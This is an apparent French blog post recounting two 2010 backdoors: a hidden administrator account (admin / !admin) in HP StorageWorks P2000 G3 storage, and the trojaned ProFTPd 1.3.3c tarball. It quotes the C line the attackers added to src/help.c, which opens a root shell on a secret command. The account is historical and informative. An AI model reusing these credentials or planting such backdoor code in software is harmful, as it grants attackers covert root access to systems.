Retour sur la Porte dérobée sous HP StorageWorks P2000 G3 (2010) et ProFTPd (2010)

Dans un logiciel, ou système informatique,une porte dérobée (de l'anglais backdoor, littéralement porte de derrière) est une fonctionnalité inconnue de l'utilisateur légitime, qui donne un accès secret au logicielLe 13 décembre 2010, un compte caché a été trouvé dans le système de stockage HP StorageWorks P2000 G3 : le nom d'utilisateur « admin » et le mot de passe « !admin » permetaient de s'identifier avec le maximum de privilèges. Il n'est pas possible de supprimer ce compte, par contre il est possible d'en changer le mot passe en passant par la ligne de commande(commande « set password admin password ... »).
En outre,Le 28 novembre 2010, le tarball de la dernière version (1.3.3c) du serveur FTP ProFTPd a été remplacé par une version contenant une porte dérobée sur le serveur FTP officiel du projet. La porte dérobée ajoute une commande « HELP ACIDBITCHEZ » qui ouvre en shell en tant que l'utilisateur root. Le tarball a été propagé sur l'ensemble des miroirs officiels. La compromission a été découverte le 1er décembre 2010, et corrigée le 2 décembre. La porte dérobée a notamment ajouté la ligne suivante au fichier src/help.c :
if (strcmp(target, "ACIDBITCHEZ")
== 0) { setuid(0); setgid(0); 
system("/bin/sh;/sbin/sh"); }
L'attaquant s'etait  introduit sur le serveur FTP en utilisant une faille du module SQL de PostgreSQL qui permet d'exécuter du code à distance. Cette faille a été publiée le 17 novembre 2010 dans le numéro 67 du magazine Phrack. La faille est corrigée par la version 1.3.3d de ProFTPd.BY TAATJENE

Comments

Popular Posts